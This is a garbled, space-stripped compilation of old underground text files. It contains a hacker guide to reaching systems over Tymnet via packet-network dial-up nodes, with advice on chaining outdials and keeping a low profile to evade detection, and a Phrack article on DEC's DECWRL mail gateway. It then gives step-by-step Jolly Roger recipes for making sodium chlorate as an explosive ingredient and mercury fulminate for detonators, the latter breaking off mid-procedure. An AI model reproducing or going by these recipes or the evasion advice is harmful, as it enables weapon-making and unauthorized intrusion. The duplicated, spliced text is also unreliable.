Onceonanetwork,youprovidetheNUA(networkuseraddress)ofthesystemyou wishtoconnectto.NUAsarestringsof15digits,brokenupinto3fields, theNETWORKADDRESS,theAREAPREFIX,andtheDNIC.Eachfieldhas5digits, andareleftpaddedwith0'swherenecessary. TheDNICdetermineswhichnetworktotaketheaddressfrom.Tymnet,forexample, is03106.03110isTelenet. TheAREAPREFIXandNETWORKADDRESSdeterminetheconnectionpoint.Byproviding theaddressofthesystemthatyouwishtoconnectto,youwillbeaccessingit throughthenet...asifyouwerecallingitdirectly.Obviously,then,this providesonemorelevelofsecurityforaccess.Byconnectingtoanoutdial,you canincreaseagainthelevelofsecurityyouenjoy,byusingtheoutdialinthat areatoconnecttotheremotesystem.

AddendumAccessingTymnetOverLocalPacketNetworks Thisisjustanotherwaytogetthatextrastepand/orbypassotherroutes.This tableiscopiedfromTymnet'sonlineinformation.Assaidearlier,it'sagreat resource,thisonlineinformation! BELLATLANTIC NODE CITY STATE SPEED ACCESSNUMBER NETWORK 03526 DOVER DELAWARE 300/2400 302/7349465 @PDN 03526 GEORGETOWN DELAWARE 300/2400 302/8567055 @PDN 03526 NEWARK DELAWARE 300/2400 302/3660800 @PDN 03526 WILMINGTON DELAWARE 300/1200 302/4280030 @PDN 03526 WILMINGTON DELAWARE 2400 302/6551144 @PDN 06254 WASHINGTON DIST.OFCOL. 300/1200 202/4797214 @PDN 06254 WASHINGTON(MIDTOWN) DIST.OFCOL. 2400 202/7851688 @PDN 06254 WASHINGTON(DOWNTOWN) DIST.OFCOL. 300/1200 202/3936003 @PDN 06254 WASHINGTON(MIDTOWN) DIST.OFCOL. 300/1200 202/2934641 @PDN 06254 WASHINGTON DIST.OFCOL. 300/1200 202/5465549 @PDN 06254 WASHINGTON DIST.OFCOL. 300/1200 202/3280619 @PDN 06254 BETHESDA MARYLAND 300/1200 301/9869942 @PDN 06254 COLESVILLE MARYLAND 300/2400 301/9899324 @PDN 06254 HYATTSVILLE MARYLAND 300/1200 301/7799935 @PDN 06254 LAUREL MARYLAND 300/2400 301/4909971 @PDN 06254 ROCKVILLE MARYLAND 300/1200 301/3409903 @PDN 06254 SILVERSPRING MARYLAND 300/1200 301/4959911 @PDN 07771 BERNARDSVILLE NEWJERSEY 300/2400 201/7667138 @PDN 07771 CLINTON NEWJERSEY 3001200 201/7308693 @PDN 07771 DOVER NEWJERSEY 300/2400 201/3619211 @PDN 07771 EATONTOWN/REDBANK NEWJERSEY 300/2400 201/7588000 @PDN 07771 ELIZABETH NEWJERSEY 300/2400 201/2895100 @PDN 07771 ENGLEWOOD NEWJERSEY 300/2400 201/8713000 @PDN 07771 FREEHOLD NEWJERSEY 300/2400 201/7808890 @PDN 07771 HACKENSACK NEWJERSEY 300/2400 201/3439200 @PDN 07771 JERSEYCITY NEWJERSEY 300/2400 201/6593800 @PDN 07771 LIVINGSTON NEWJERSEY 300/2400 201/5330561 @PDN 07771 LONGBRANCH/REDBANK NEWJERSEY 300/2400 201/7588000 @PDN 07771 MADISON NEWJERSEY 300/2400 201/5930004 @PDN 07771 METUCHEN NEWJERSEY 300/2400 201/9069500 @PDN 07771 MIDDLETOWN NEWJERSEY 300/2400 201/9579000 @PDN 07771 MORRISTOWN NEWJERSEY 300/2400 201/4550437 @PDN 07771 NEWARK NEWJERSEY 300/2400 201/6230083 @PDN 07771 NEWBRUNSWICK NEWJERSEY 300/2400 201/2472700 @PDN 07771 NEWFOUNDLAND NEWJERSEY 300/2400 201/6979380 @PDN 07771 PASSAIC NEWJERSEY 300/2400 201/4736200 @PDN 07771 PATERSON NEWJERSEY 300/2400 201/3457700 @PDN 07771 PHILLIPSBURG NEWJERSEY 300/2400 201/4549270 @PDN 07771 POMPTONLAKES NEWJERSEY 300/2400 201/8358400 @PDN 07771 REDBANK NEWJERSEY 300/2400 201/7588000 @PDN 07771 RIDGEWOOD NEWJERSEY 300/2400 201/4454800 @PDN 07771 SOMERVILLE NEWJERSEY 300/2400 201/2181200 @PDN 07771 SOUTHRIVER NEWJERSEY 300/2400 201/3909100 @PDN 07771 SPRINGLAKE NEWJERSEY 300/2400 201/9740850 @PDN 07771 TOMSRIVER NEWJERSEY 300/2400 201/2863800 @PDN 07771 WASHINGTON NEWJERSEY 300/2400 201/6896894 @PDN 07771 WAYNE/PATERSON NEWJERSEY 300/2400 201/3457700 @PDN 03526 ALLENTOWN PENNSYLVANIA 300/1200 215/4350266 @PDN 11301 ALTOONA PENNSYLVANIA 300/1200 814/9468639 @PDN 11301 ALTOONA PENNSYLVANIA 2400 814/9490505 @PDN 03526 AMBLER PENNSYLVANIA 300/1200 215/2832170 @PDN 10672 AMBRIDGE PENNSYLVANIA 300/1200 412/2669610 @PDN

10672 10672 03526 03526 10672 03526

CARNEGIE PENNSYLVANIA 300/1200 412/2761882 @PDN CHARLEROI PENNSYLVANIA 300/1200 412/4839100 @PDN CHESTERHEIGHTS PENNSYLVANIA 300/1200 215/3580820 @PDN COATESVILLE PENNSYLVANIA 300/1200 215/3837212 @PDN CONNELLSVILLE PENNSYLVANIA 300/1200 412/6287560 @PDN DOWNINGTON/COATES. PENNSYLVANIA 300/1200 215/3837212 @PDN 03562 DOYLESTOWN PENNSYLVANIA 300/1200 215/3400052 @PDN 03562 GERMANTOWN PENNSYLVANIA 300/1200 2158434075 @PDN 10672 GLENSHAW PENNSYLVANIA 300/1200 412/4876868 @PDN 10672 GREENSBURG PENNSYLVANIA 300/1200 412/8367840 @PDN 11301 HARRISBURG PENNSYLVANIA 300/1200 717/2363274 @PDN 11301 HARRISBURG PENNSYLVANIA 2400 717/2380450 @PDN 10672 INDIANA PENNSYLVANIA 300/1200 412/4657210 @PDN 03526 KINGOFPRUSSIA PENNSYLVANIA 300/1200 215/2702970 @PDN 03526 KIRKLYN PENNSYLVANIA 300/1200 215/7895650 @PDN 03526 LANSDOWNE PENNSYLVANIA 300/1200 215/6269001 @PDN 10672 LATROBE PENNSYLVANIA 300/1200 412/5370340 @PDN 11301 LEMOYNE/HARRISBURG PENNSYLVANIA 300/1200 717/2363274 @PDN 10672 MCKEESPORT PENNSYLVANIA 300/1200 412/6736200 @PDN 10672 NEWCASTLE PENNSYLVANIA 300/1200 412/6585982 @PDN 10672 NEWKENSINGTON PENNSYLVANIA 300/1200 412/3370510 @PDN 03526 NORRISTOWN PENNSYLVANIA 300/1200 215/2702970 @PDN 03526 PAOLI PENNSYLVANIA 300/1200 215/6480010 @PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/9237792 @PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/5570659 @PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/5457886 @PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/6770321 @PDN 03562 PHILADELPHIA PENNSYLVANIA 2400 215/6250770 @PDN 10672 PITTSBURGH PENNSYLVANIA 300/1200 412/2818950 @PDN 10672 PITTSBURGH PENNSYLVANIA 300/1200 4126874131 @PDN 10672 PITTSBURGH PENNSYLVANIA 2400 412/2619732 @PDN 10672 POTTSTOWN PENNSYLVANIA 300/1200 215/3278032 @PDN 03526 QUAKERTOWN PENNSYLVANIA 300/1200 215/5387032 @PDN 03526 READING PENNSYLVANIA 300/1200 215/3757570 @PDN 10672 ROCHESTER PENNSYLVANIA 300/1200 412/7289770 @PDN 03526 SCRANTON PENNSYLVANIA 300/1200 717/3481123 @PDN 03526 SCRANTON PENNSYLVANIA 2400 717/3411860 @PDN 10672 SHARON PENNSYLVANIA 300/1200 412/3421681 @PDN 03526 TULLYTOWN PENNSYLVANIA 300/1200 215/5473300 @PDN 10672 UNIONTOWN PENNSYLVANIA 300/1200 412/4375640 @PDN 03562 VALLEYFORGE PENNSYLVANIA 300/1200 215/2702970 @PDN 10672 WASHINGTON PENNSYLVANIA 300/1200 412/2239090 @PDN 03526 WAYNE PENNSYLVANIA 300/1200 215/3419605 @PDN 10672 WILKINSBURG PENNSYLVANIA 300/1200 412/2411006 @PDN 06254 ALEXANDRIA VIRGINIA 300/1200 703/6836710 @PDN 06254 ARLINGTON VIRGINIA 300/1200 703/5248961 @PDN 06254 FAIRFAX VIRGINIA 300/1200 703/3851343 @PDN 06254 MCLEAN VIRGINIA 300/1200 703/8482941 @PDN @PDNBELLATLANTICNETWORKNAMEISPUBLICDATANETWORK(PDN) (CONNECTMESSAGE) ._._._<_C_R_>_(SYNCHRONIZESDATASPEEDS) WELCOMETOTHEBPA/DSTPDN *._T__<_C_R_>_(TYMNETADDRESS) 131069(ADDRESSCONFIRMATIONTYMNETDNIC)

COM(CONFIRMATIONOFCALLSETUP) GWY0XXXXTYMNET:PLEASELOGIN:(HOST#WITHINDASHES) BELLSOUTH NODE CITY STATE DENSITY ACCESSNUMBER MODEM 10207 ATLANTA GEORGIA 300/1200 404/2614633 @PLSK 10207 ATHENS GEORGIA 300/1200 404/3540614 @PLSK 10207 COLUMBUS GEORGIA 300/1200 404/3245771 @PLSK 10207 ROME GEORGIA 300/1200 404/234/7542 @PLSK @PLSKBELLSOUTHNETWORKNAMEISPULSELINK (CONNECTMESSAGE) ._._.__<_C_R_>_(SYNCHRONIZESDATASPEEDS) (DOESNOTECHOTOTHETERMINAL) CONNECTED PULSELINK 1_3_1_0_6_(TYMNETADDRESS) (DOESNOTECHOTOTHETERMINAL) PULSELINK:CALLCONNECTEDTO13106 GWY0XXXXTYMNET:PLEASELOGIN:(HOST#WITHINDASHES) PACIFICBELL NODE CITY STATE DENSITY ACCESSNUMBER NETWORK 03306 BERKELEY CALIFORNIA 300/1200 4155482121 @PPS 06272 ELSEGUNDO CALIFORNIA 300/1200 2136408548 @PPS 06272 FULLERTON CALIFORNIA 300/1200 7144412777 @PPS 06272 INGLEWOOD CALIFORNIA 300/1200 2132167667 @PPS 06272 ANGELES(DOWNTOWN) CALIFORNIA 300/1200 2136873727 @PPS 06272 LOSANGELES CALIFORNIA 300/1200 2134801677 @PPS 03306 MOUNTAINVIEW CALIFORNIA 300/1200 4159603363 @PPS 03306 OAKLAND CALIFORNIA 300/1200 4158939889 @PPS 03306 PALOALTO CALIFORNIA 300/1200 4153254666 @PPS 06272 PASADENA CALIFORNIA 300/1200 8183560780 @PPS 03306 SANFRANCISCO CALIFORNIA 300/1200 4155438275 @PPS 03306 SANFRANCISCO CALIFORNIA 300/1200 4156265380 @PPS 03306 SANFRANCISCO CALIFORNIA 300/1200 4153622280 @PPS 03306 SANJOSE CALIFORNIA 300/1200 4089200888 @PPS 06272 SANTAANNA CALIFORNIA 300/1200 7149729844 @PPS 06272 VANNUYS CALIFORNIA 300/1200 8187801066 @PPS @PPSPACIFICBELLNETWORKNAMEISPUBLICPACKETSWITCHING(PPS) (CONNECTMESSAGE) ._._._<_C_R_(SYNCHRONIZESDATASPEEDS) (DOESNOTECHOTOTHETERMINAL) ONLINE1200 WELCOMETOPPS:415XXXXXXX 1_3_1_0_6_9_(TYMNETADDRESS) (DOESNOTECHOUNTILTYMNETRESPONDS) GWY0XXXXTYMNET:PLEASELOGIN:(HOST#WITHINDASHES)

SOUTHERNNEWENGLAND NODE CITY STATE DENSITY ACCESSNUMBERS NETWORK 02727 BRIDGEPORT CONNECTICUT 300/2400 203/3666972 @CONNNET 02727 BRISTOL CONNECTICUT 300/2400 203/5895100 @CONNNET 02727 CANAAN CONNECTICUT 300/2400 203/8245103 @CONNNET 02727 CLINTON CONNECTICUT 300/2400 203/6694243 @CONNNET 02727 DANBURY CONNECTICUT 300/2400 203/7432906 @CONNNET 02727 DANIELSON CONNECTICUT 300/2400 203/7791880 @CONNNET 02727 HARTFORD/MIDDLETOWN CONNECTICUT 300/2400 203/7246219 @CONNNET 02727 MERIDEN CONNECTICUT 300/2400 203/2373460 @CONNNET 02727 NEWHAVEN CONNECTICUT 300/2400 203/7761142 @CONNNET 02727 NEWLONDON CONNECTICUT 300/2400 203/4430884 @CONNNET 02727 NEWMILFORD CONNECTICUT 300/2400 203/3550764 @CONNNET 02727 NORWALK CONNECTICUT 300/2400 203/8665305 @CONNNET 02727 OLDGREDDWICH CONNNETICUT 300/2400 203/6378872 @CONNNET 02727 OLDSAYBROOK CONNECTICUT 300/2400 203/3880778 @CONNNET 02727 SEYMOUR CONNECTICUT 300/2400 203/8811455 @CONNNET 02727 STAMFORD CONNECTICUT 300/2400 203/3249701 @CONNNET 02727 STORRS CONNECTICUT 300/2400 203/4294243 @CONNNET 02727 TORRINGTON CONNECTICUT 300/2400 203/4829849 @CONNNET 02727 WATERBURY CONNECTICUT 300/2400 203/5970064 @CONNNET 02727 WILLIMANTIC CONNECTICUT 300/2400 203/4564552 @CONNNET 02727 WINDSOR CONNECTICUT 300/2400 203/6889330 @CONNNET 02727 WINDSORLCKS/ENFIELD CONNECTICUT 300/2400 203/6239804 @CONNNET @CONNNETSOUTHERNNEWENGLANDTELEPHONENETWORKNAMEINCONNNET (CONNECTMESSAGE) H_H_<_C_R_>(SYNCHRONIZESDATASPEEDS) (DOESNOTECHOTOTHETERMINAL) CONNNET ._T_<_C_R_>_(MUSTBECAPITALLETTERS) 26SEP8818:33(DATA) 031069(ADDRESSCONFIRMATION) COM(CONFIRMATIONOFCALLSETUP) GWYOXXXXTYMNET:PLEASELOGIN: SOUTHWESTERNBELL NODE CITY STATE DENSITY ACCESSNUMBERS NETWORK 05443 KANSASCITY KANSAS 300/1200 316/2259951 @MRLK 05443 HAYS KANSAS 300/1200 913/6258100 @MRLK 05443 HUTCHINSON KANSAS 300/1200 316/6691052 @MRLK 05443 LAWRENCE KANSAS 300/1200 913/8415580 @MRLK 05443 MANHATTAN KANSAS 300/1200 913/5399291 @MRLK 05443 PARSONS KANSAS 300/1200 316/4210620 @MRLK 05443 SALINA KANSAS 300/1200 913/8254547 @MRLK 05443 TOPEKA KANSAS 300/1200 913/2351909 @MRLK 05443 WICHITA KANSAS 300/1200 316/2691996 @MRLK 04766 BRIDGETON/ST.LOUIS MISSOURI 300/1200 314/6220900 04766 ST.LOUIS MISSOURI 300/1200 314/6220900 @MRLK

@MRLK

Onasidenote,therecentbookTheCuckoo'sEggprovidessomeinteresting information(intheformofastory,however)onaTymnethacker.Rememberthat hewasintoBIGthings,andhencehewascrackeddownupon.Ifyoukeepalow profile,networksshouldprovideagoodaccessmethod. IfyoucanfindasystemthatisconnectedtotheInternetthatyoucangeton fromTymnet,youaredoingwell.

129.PhrackMagazineVol.3,Issue30byDedicatedLink INTRODUCTION DECWRLisamailgatewaycomputeroperatedbyDigital'sWesternResearch LaboratoryinPaloAlto,California.Itspurposeistosupporttheinterchange ofelectronicmailbetweenDigitalandthe"outsideworld." DECWRLisconnectedtoDigital'sEasynet,andalsotoanumberofdifferent outsideelectronicmailnetworks.Digitaluserscansendoutsidemailbysending toDECWRL::"outsideaddress",anddigitaluserscanalsoreceivemailbyhaving yourcorrespondentsrouteitthroughDECWRL.Thedetailsofincomingmailare morecomplex,andarediscussedbelow. ItisvitallyimportantthatDigitalemployeesbegoodcitizensofthenetworks towhichweareconnected.Theydependontheintegrityofourusercommunity toensurethattightercontrolsovertheuseofthegatewayarenotrequired. Themostimportantruleis"nochainletters,"butthereareotherrules dependingonwhethertheconnectednetworkthatyouareusingiscommercialor noncommercial. Thecurrenttrafficvolume(September1989)isabout10,000mailmessagesper dayandabout3,000USENETmessagesperday.Gatewayedmailtraffichasdoubled everyyearsince1983.DECWRLiscurrentlyaVax8530computerwith48megabytes ofmainmemory,2500megabytesofdiskspace,89600baud(Telebit)modemports, andvariousnetworkconnections.TheywillshortlybeupgradingtoaVax8650 system.TheyrunUltrix3.0asthebaseoperatingsystem. ADMINISTRATION Thegatewayhasengineeringstaff,butnoadministrativeorclericalstaff.They workhardtokeepitrunning,buttheydonothavetheresourcestoanswer telephonequeriesorprovidetutorialsinitsuse. TheypostperiodicstatusreportstotheUSENETnewsgroupdec.general.Various helpfulpeopleusuallycopythesereportstotheVAXNOTES"gateways"conference withinadayortwo. HOWTOSENDMAIL DECWRLisconnectedtoquiteanumberofdifferentmailnetworks.Ifyouwere loggedondirectlytoit,youcouldtypeaddressesdirectly,e.g. To:strange!foreign!address. Butsinceyouarenotloggedondirectlytothegateway,youmustsendmailso thatwhenitarrivesatthegateway,itwillbesentasifthataddresshadbeen typedlocally. *SendingfromVMS IfyouareaVMSuser,youshoulduseNMAIL,becauseVMSmaildoesnotknowhow torequeueandretrymailwhenthenetworkiscongestedordisconnected.From VMS,addressyourmaillikethis: To:nm%DECWRL::"strange!foreign!address" Thequotecharacters(")areimportant,tomakesurethatVMSdoesn'ttryto interpretstrange!foreign!addressitself.Ifyouaretypingsuchanaddress insideamailprogram,itwillworkasadvertised.IfyouareusingDCLand typingdirectlytothecommandline,youshouldbewarethatDCLlikestoremove quotes,soyouwillhavetoenclosetheentireaddressinquotes,andthenput twoquotesineveryplacethatonequoteshouldappearintheaddress:

$mailtest.msg"nm%DECWRL::""foreign!addr"""/subj="hello" Notethethreequotesinarowafterforeign!addr.Thefirsttwoofthemare doubledtoproduceasinglequoteintheaddress,andthethirdendstheaddress itself(balancingthequoteinfrontofthenm%). HerearesometypicaloutgoingmailaddressesasusedfromaVMSsystem: To:nm%DECWRL::"lllwinkin!netsys!phrack" To:nm%DECWRL::"postmaster@msp.pnet.sc.edu" To:nm%DECWRL::"netsys!phrack@uunet.uu.net" To:nm%DECWRL::"phrackserv@CUNYVM.bitnet" To:nm%DECWRL::"Chris.Jones@f654.n987.z1.fidonet.org" *SendingfromUltrix IfyourUltrixsystemhasbeenconfiguredforit,thenyoucan,fromyourUltrix system,justsenddirectlytotheforeignaddress,andthemailsoftwarewill takecareofallofthegatewayroutingforyou.MostUltrixsystemsin CorporateResearchandinthePaloAltoclusterareconfiguredthisway. TofindoutwhetheryourUltrixsystemhasbeensoconfigured,justtryitand seewhathappens.Ifitdoesn'twork,youwillreceivenotificationalmost instantly. NOTE:TheUltrixmailsystemisextremelyflexible;itisalmostcompletely configurablebythecustomer.Whilethisisvaluabletocustomers,itmakesit verydifficulttowriteglobalinstructionsfortheuseofUltrixmailers, becauseitispossiblethatthelocalchangeshaveproducedsomethingquite unlikethevendordeliveredmailer.Oneofthepopularchangesistotinkerwith themeaningofquotecharacters(")inUltrixaddresses.Somesystemsconsider thatthesetwoaddressesarethesame: site1!site2!user@host.dec.com and "site1!site2!user"@host.dec.com whileothersareconfiguredsothatoneformwillworkandtheotherwillnot. Alloftheseexamplesusethequotes.Ifyouhavetroublegettingtheexamples towork,pleasetrythemagainwithoutthequotes.PerhapsyourUltrixsystemis interpretingthequotesdifferently. IfyourUltrixsystemhasanIPlinktoPaloAlto(type"/etc/ping decwrl.dec.com"tofindoutifitdoes),thenyoucanrouteyourmailtothe gatewayviaIP.ThishastheadvantagethatyourUltrixmailheaderswillreach thegatewaydirectly,insteadofbeingtranslatedintoDECNETmailheadersand thenbackintoUltrixattheotherend.Dothisasfollows: To:"alien!address"@decwrl.dec.com Thequotesarenecessaryonlyifthealienaddresscontainsa!character,but theydon'thurtifyouusethemunnecessarily.Ifthealienaddresscontainsan "@"character,youwillneedtochangeitintoa"%"character.Forexample,to sendviaIPtojoe@widget.org,youshouldaddressthemail. To:"joe%widget.org"@decwrl.dec.com IfyourUltrixsystemhasonlyaDECNETlinktoPaloAlto,thenyoushould

addressmailinmuchthesamewaythatVMSusersdo,savethatyoushouldnot putthenm%infrontoftheaddress: To:DECWRL::"strange!foreign!address" HerearesometypicaloutgoingmailaddressesasusedfromanUltrixsystemthat hasIPaccess.UltrixsystemswithoutIPaccessshouldusethesamesyntaxas VMSusers,exceptthatthenm%atthefrontoftheaddressshouldnotbeused. To:"lllwinken!netsys!phrack"@decwrl.dec.com To:"postmaster%msp.pnet.sc.edu"@decwrl.dec.com To:"phrackserv%CUNYVM.bitnet"@decwrl.dec.com To:"netsys!phrack%uunet.uu.net"@decwrl.dec.com To:"Chris.Jones@f654.n987.z1.fidonet.org"@decwrl.dec.com DETAILSOFUSINGOTHERNETWORKS Alloftheworld'scomputernetworksareconnectedtogether,moreorless,soit ishardtodrawexactboundariesbetweenthem.Preciselywheretheinternetends andUUCPbeginsisamatterofinterpretation. Forpurposesofsendingmail,though,itisconvenienttodividethenetwork universeintothesecategories: Easynet: Digital'sinternalDECNETnetwork.Characterizedbyaddressesoftheform NODE::USER.Easynetcanbeusedforcommercialpurposes. Internet: AcollectionofnetworksincludingtheoldARPAnet,theNSFnet,theCSnet,and others.Mostinternationalresearch,development,andeducationalorganizations areconnectedinsomefashiontotheInternet.Characterizedbyaddressesofthe formuser@site.subdomain.domain.Theinternetitselfcannotbeusedfor commercialpurposes. UUCP: Averyprimitivenetworkwithnomanagement,builtwithautodialersphoningone computerfromanother.Characterizedbyaddressesoftheform place1!place2!user.TheUUCPnetworkcanbeusedforcommercialpurposes providedthatnoneofthesitesthroughwhichthemessageisroutedobjectsto that. USENET: Notanetworkatall,butalayerofsoftwarebuiltontopofUUCPandInternet. BITNET: AnIBMbasednetworklinkingprimarilyeducationalsites.Digitaluserscansend toBITNETasifitwerepartofinternet,butBITNETusersneedspecial instructionsforreversingtheprocess.BITNETcannotbeusedforcommercial purposes. Fidonet: Anetworkofpersonalcomputers.IamunsureofthestatusofusingFidonetfor commercialpurposes,noramIsureofitsefficacy. DOMAINSANDDOMAINADDRESSING Thereisaparticularnetworkcalled"theInternet;"itissomewhatrelatedto whatusedtobe"theARPAnet."TheInternetstyleofaddressingisflexible enoughthatpeopleuseitforaddressingothernetworksaswell,withtheresult thatitisquitedifficulttolookatanaddressandtelljustwhatnetworkit islikelytotraverse.Butthephrase"Internetaddress"doesnotmean"mail

addressofsomecomputerontheInternet"butrather"mailaddressinthestyle usedbytheInternet."Terminologyisevenfurtherconfusedbecausetheword "address"meansonethingtopeoplewhobuildnetworksandsomethingentirely differenttopeoplewhousethem.Inthisfilean"address"issomethinglike "mike@decwrl.dec.com"andnot"192.1.24.177"(whichiswhatnetworkengineers wouldcallan"internetaddress"). TheInternetnamingschemeuseshierarchicaldomains,whichdespitetheirtitle arejustabookkeepingtrick.Itdoesn'treallymatterwhetheryousayNODE: :USERorUSER@NODE,butwhathappenswhenyouconnecttwocompanies'networks togetherandtheybothhaveanodeANCHOR??Youmust,somehow,specifywhich ANCHORyoumean.YoucouldsayANCHOR.DEC::USERorDEC.ANCHOR::USERor USER@ANCHOR.DECorUSER@DEC.ANCHOR.TheInternetconventionistosay USER@ANCHOR.DEC,withtheowner(DEC)afterthename(ANCHOR). ButtherecouldbeseveraldifferentorganizationsnamedDEC.Youcouldhave DigitalEquipmentCorporationorDownEastCollegeorDisabledEducation Committee.ThetechniquethattheInternetschemeusestoresolveconflictslike thisistohavehierarchicaldomains.Anormaldomainisn'tDECorSTANFORD,but DEC.COM(commercial)andSTANFORD.EDU(educational).Thesedomainscanbe furtherdividedintoZK3.DEC.COMorCS.STANFORD.EDU.Thisdoesn'tresolve conflictscompletely,though:bothCentralMichiganUniversityandCarnegie MellonUniversitycouldclaimtobeCMU.EDU.Theruleisthattheownerofthe EDUdomaingetstodecide,justastheowneroftheCMU.EDUgetstodecide whethertheElectricalEngineeringdepartmentortheElementaryEducation departmentgetssubdomainEE.CMU.EDU. Thedomainscheme,whilenotperfect,iscompletelyextensible.Ifyouhavetwo addressesthatcanpotentiallyconflict,youcansuffixsomedomaintotheend ofthem,therebymaking,say,decwrl.UUCPbesomehowdifferentfromDECWRL.ENET. DECWRL'sentiremailsystemisorganizedaccordingtoInternetdomains,andin factwehandleallmailinternallyasifitwereInternetmail.Incomingmailis convertedintoInternetmail,andthenroutedtotheappropriatedomain;ifthat domainrequiressomeconversion,thenthemailisconvertedtotherequirements oftheoutbounddomainasitpassesthroughthegateway.Forexample,theyput EasynetmailintothedomainENE. Onasidenote,therecentbookTheCuckoo'sEggprovidessomeinteresting information(intheformofastory,however)onaTymnethacker.Rememberthat hewasintoBIGthings,andhencehewascrackeddownupon.Ifyoukeepalow profile,networksshouldprovideagoodaccessmethod. IfyoucanfindasystemthatisconnectedtotheInternetthatyoucangeton fromTymnet,youaredoingwell. Username@f.n.z.ifna.org Inotherwords,ifIwantedtomailtoSiliconSwindlerat1:135/5,theaddress wouldbeSilicon_Swindler@f5.n135.z1.ifna.organd,providedthatyourmailer knowsthe.ifna.orgdomain,itshouldgetthroughalright.Apparently,asofthe writingofthisarticle,theyhaveimplementedanewgatewaynamecalled fidonet.orgwhichshouldworkinplaceofifna.orginallroutings.Ifyour mailerdoesnotknoweitherofthesedomains,usetheaboveroutingbutreplace thefirst"@"witha"%"andthenafterwards,useeitherofthefollowing mailersafterthe"@":CS.ORST.EDUorK9.CS.ORST.EDU(i.e. username%f.n.z.fidonet.org@CS.ORST.EDU[orreplaceCS.ORST.EDUwith K9.CS.ORST.EDU]). ThefollowingisalistcompiledbyBillFenner(WCF@PSUECL.BITNET)thatwas postedonINFONETSDIGESTwhichlistsanumberofFIDONETgateways:

Net 104 105 107 109 125 128 129 143 152 161 369

Node 56 55 320 661 406 19 65 N/A 200 N/A 17

NodeName milehi.ifna.org casper.ifna.org rubbs.ifna.org blkcat.ifna.org fidogate.ifna.org hipshk.ifna.org insight.ifna.org fidogate.ifna.org castle.ifna.org fidogate.ifna.org megasys.ifna.org

NOTE:TheUUCPequivalentnodenameisthefirstpartofthenodename.In otherwords,theUUCPnodemilehiislistedasmilehi.ifna.orgbutcanbemailed directlyovertheUUCPnetwork. AnotherwaytomailtoFIDONET,specificallyforInternetpeople,isinthis format: ihnp4!necntc!ncoast!ohiont!!!user_name@husc6.harvard.edu AndforthoseUUCPmailingpeopleoutthere,justusethepathdescribedand ignorethe@husc5.harvard.eduportion.ThereisaFIDONETNODELISTavailableon mostanyFIDONETbulletinboard,butitisquitelarge. ONTYME PreviouslyknownasTymnet,OnTymeistheMcDonnellDouglasrevision.Afterthey boughtoutTymnet,theyrenamedthecompanyandopenedanexperimentalInternet gatewayatONTYME.TYMNET.COMbutthisissupposedlyonlygoodforcertain corporateaddresseswithinMcDonnellDouglasandTymnet,nottheircustomers. Theuseridformatisxx.yyyorxx.y/yywherexxisanetnameandyyy(ory/yy) isatrueusername.Ifyoucannotdirectlynailthis,try: xx.yyy%ONTYME.TYM 130.SodiumChloratebytheJollyRoger SodiumChlorateisastrongoxidizerusedinthemanufactureofexplosives.It canbeusedinplaceofPotassiumChlorate. MaterialRequired: 2carbonorleadrods(1in.diameterby5in.long) Salt,oroceanwater Sulfuricacid,diluted MotorVehicle Water 2wires,16gauge(3/64in.diameterapprox.),6ft.long,insulated. Gasoline 1gallonglassjar,widemouth(5in.diameterby6in.highapprox.) Sticks String Teaspoon Trays Cup Heavycloth Knife Largeflatpanortray SourcesofCarbonorLeadrods: DryCellBatteries(2in.diameterby7"long)orplumbingsupplystore.

SourcesofSaltWater: Grocerystoreorocean SourcesofSulfuricAcid: MotorVehicleBatteries. Procedure: 1. Mixcupofsaltintotheonegallonglassjarwith3liters(3quarts) ofwater. 2. Add2teaspoonsofbatteryacidtothesolutionandstirvigorouslyfor5 minutes. 3. Stripabout4inchesofinsulationfrombothendsofthetwowires. 4. Withknifeandsticks,shape2stripsofwood1by1/8by1.Tiethe woodstripstotheleadorcarbonrodssothattheyare1inchesapart. 5. Connecttherodstothebatteryinamotorvehiclewiththeinsulated wire. 6. Submerge4inchesoftherodsinthesaltwatersolution. 7. Withgearinneutralposition,startthevehicleengine.Depressthe acceleratorapprox.1/5ofitsfulltravel. 8. Runtheenginewiththeacceleratorinthispositionfor2hours,then shutitdownfor2hours. 9. Repeatthiscycleforatotalof64hourswhilemaintainingthelevelof theacidsaltwatersolutionintheglassjar. CAUTION:Thisarrangementemploysvoltageswhichcanbequitedangerous! Donottouchbarewireleadswhileengineisrunning!! 10. Shutofftheengine.Removetherodsfromtheglassjaranddisconnect wireleadsfromthebattery. 11. Filterthesolutionthroughtheheavyclothintoaflatpanortray, leavingthesedimentatthebottomoftheglassjar. 12. Allowthewaterinthefilteredsolutiontoevaporateatroomtemperature (approx.16hours).Theresidueisapproximately60%ormoresodiumchlorate whichispureenoughtobeusedasanexplosiveingredient. 131.MercuryFulminatebytheJollyRoger MercuryFulminateisusedasaprimaryexplosiveinthefabricationof detonators.ItistobeusedwithaboosterexplosivesuchaspicricacidorRDX (whichareelsewhereinthisCookbook). MaterialRequired: NitricAcid,90%conc.(1.48sp.gr) Mercury Ethyl(grain)alcohol(90%) Filteringmaterial[PaperTowels] Teaspoonmeasure(,,and1tsp.capacity)aluminum,stainlesssteelor waxcoated HeatSource Cleanwoodenstick Cleanwater Glasscontainers Tape Syringe SourceofNitricAcid: ElsewhereinthisCookbook Industrialmetalprocessors SourceofMercury:

Thermometers Mercuryswitches Oldradiotubes

Procedure: 1. Dilute5teaspoonsofnitricacidwith2teaspoonsofcleanwaterina glasscontainerbyaddingtheacidtothewater. 2. Dissolve1/8teaspoonofmercuryinthedilutednitricacid.Thiswill yielddarkredfumes.NOTE:Itmaybenecessarytoaddwater,ondropatatime, tothemercuryacidsolutioninordertostartareaction. CAUTION:Acidwillburnskinanddestroyclothing.Ifanyisspilled,wash itawaywithalargequantityofwater.DoNOTinhalefumes! 3. Warm10teaspoonsofthealcoholinacontaineruntilthealcoholfeels warmtotheinsideofthewrist. 4. Pourthemetalacidsolutionintothewarmalcohol.Reactionshouldstart inlessthan5minutes.Densewhitefumeswillbegivenoffduringthereaction. Astimelapses,thefumeswillbecomelessdense.Allow10to15minutesto completereaction.Fulminatewillsettletothebottom. CAUTION:Thisreactiongenerateslargequantitiesoftoxic,flammable fumes.TheprocessMUSTbeconductedoutdoorsorinawellventilatedarea,away fromsparksoropenflames.DONOTinhalefumes! 5. Filterthesolutionthroughapapertowelintoacontainer.Crystalsmay 